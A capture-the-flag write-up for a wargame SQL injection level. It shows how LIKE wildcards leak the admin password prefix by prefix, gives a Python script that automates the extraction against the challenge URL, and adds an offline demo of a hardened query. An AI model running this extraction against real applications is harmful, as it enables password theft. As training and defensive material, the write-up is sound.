
assassin


We are provided with the SQL query:

SELECT id FROM prob_assassin WHERE pw LIKE '{$_GET[pw]}'

Filter

The code filters out the following characters:

  • Single quotes

Blind SQL Injection

Single quotes are filtered, so we cannot break out of the string literal, but the LIKE operator still interprets wildcards inside it. We use wildcards to leak the password one character at a time.

Wildcard


Specifically, we use the % wildcard, which matches any sequence of zero or more characters.

If we provide the following URI parameter:

?pw=%

The resultant query becomes:

SELECT id FROM prob_assassin WHERE pw LIKE '%'


Since '%' matches every row and the Hello guest message is printed, the guest row comes before the admin row: whenever both passwords match a pattern, only the guest greeting is shown.

Let's provide the following URI:

?pw=0%

The resultant query becomes:

SELECT id FROM prob_assassin WHERE pw LIKE '0%'


Neither password starts with 0.

We try the remaining characters in turn, moving up to the following:

?pw=9%

The resultant query becomes:

SELECT id FROM prob_assassin WHERE pw LIKE '9%'


So the guest and admin passwords share the same first character, 9.

We keep extending the prefix one character at a time in the same way until the response contains the Hello admin message. At that point the prefix no longer matches the guest password and matches the admin password only.

902%

Script

We can automate the entire process using a script.

assassin_script.py

import requests
import urllib.parse
import string

cookies = {'PHPSESSID': 'cih6lj5v0dkr263t42fnn0d7br'}
url = 'https://los.rubiya.kr/chall/assassin_14a1fd552c61c60f034879e5d4171373.php'

guest_password = ''
admin_password = ''
searchspace = string.digits + string.ascii_letters
print()

for index in range(1, 9):
    for char in searchspace:
        # Extend the prefix shared so far by one candidate character
        payload = f"{guest_password}{char}"
        encoded_payload = urllib.parse.quote_plus(payload)
        full_url = f'{url}?pw={encoded_payload}%'

        response = requests.get(full_url, cookies=cookies)

        if "Hello admin" in response.text:
            # The prefix now matches only the admin row: this is the distinguishing character
            admin_password = guest_password + char
            break
        elif "Hello guest" in response.text:
            # The prefix still matches the guest row (listed first), so both passwords share it
            guest_password += char
            print(f'[x] Common character: {char}')
            break
    if admin_password:
        # Stop as soon as the admin-only prefix has been found
        break

print()
print(f'[x] Distinct character: {char}')
print(f'[!] Extracted password: {admin_password}%')
print(f'[!] Final payload: ?pw={admin_password}%')

$ python .\assassin_script.py

[x] Common character: 9
[x] Common character: 0

[x] Distinct character: 2
[!] Extracted password: 902%
[!] Final payload: ?pw=902%

If we provide the following URI:

?pw=902%

The resultant query becomes:

SELECT id FROM prob_assassin WHERE pw LIKE '902%'
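As an added example (not part of the writeup and not the challenge's own code), the following Python script reproduces the prefix walk offline against an in-memory SQLite table filled with constructed sample passwords, and then shows that the same walk learns nothing once the query compares with = through a bound parameter. The table name mirrors the challenge; the sample passwords and the make_db, vulnerable_lookup, hardened_lookup and walk_prefix names are this example's own.

```python
import sqlite3
import string

# Constructed sample rows (hypothetical values, not the challenge's real passwords).
# guest is inserted first so that, as in the challenge, its row wins when both match.
SAMPLE_ROWS = [("guest", "90abcd"), ("admin", "902xyz")]
SEARCHSPACE = string.digits + string.ascii_letters


def make_db():
    """In-memory SQLite table shaped like prob_assassin, filled with SAMPLE_ROWS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE prob_assassin (id TEXT, pw TEXT)")
    conn.executemany("INSERT INTO prob_assassin VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn, pw):
    """The challenge's shape: input spliced into LIKE, the first matching id is greeted."""
    row = conn.execute(
        f"SELECT id FROM prob_assassin WHERE pw LIKE '{pw}'"
    ).fetchone()
    return row[0] if row else None


def hardened_lookup(conn, pw):
    """Exact comparison through a bound parameter: % and _ are ordinary characters."""
    row = conn.execute(
        "SELECT id FROM prob_assassin WHERE pw = ?", (pw,)
    ).fetchone()
    return row[0] if row else None


def walk_prefix(lookup, max_len=8):
    """Reproduce the writeup's prefix walk against a lookup function.

    The only oracle is which id comes back (guest, admin or nothing). A guest
    hit means the prefix is shared by both rows; an admin hit means the prefix
    now excludes guest. Returns (admin_only_prefix, number_of_queries); the
    prefix is None when no query ever distinguishes the rows (hardened case).
    """
    prefix = ""
    queries = 0
    for _ in range(max_len):
        for ch in SEARCHSPACE:
            queries += 1
            who = lookup(prefix + ch + "%")
            if who == "admin":
                return prefix + ch, queries
            if who == "guest":
                prefix += ch
                break
        else:
            # No character extended the prefix: nothing left to learn.
            return None, queries
    return None, queries


def demo():
    """Run the walk against both query shapes and return both outcomes."""
    conn = make_db()
    leaked = walk_prefix(lambda pw: vulnerable_lookup(conn, pw))
    blocked = walk_prefix(lambda pw: hardened_lookup(conn, pw))
    return leaked, blocked


if __name__ == "__main__":
    print(demo())
```

Against the sample rows the vulnerable lookup gives up the admin-only prefix 902 after 14 queries, exactly the 9, 0, 2 sequence the writeup's script prints; against the hardened lookup every query returns nothing and the walk stops after one pass over the search space. Note that binding the parameter alone is not the fix if the query keeps LIKE: a bound '902%' is still a pattern, and in MySQL _ is a wildcard as well. The fix is the exact comparison, and in a real application the comparison should be against a password hash rather than a stored plaintext.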
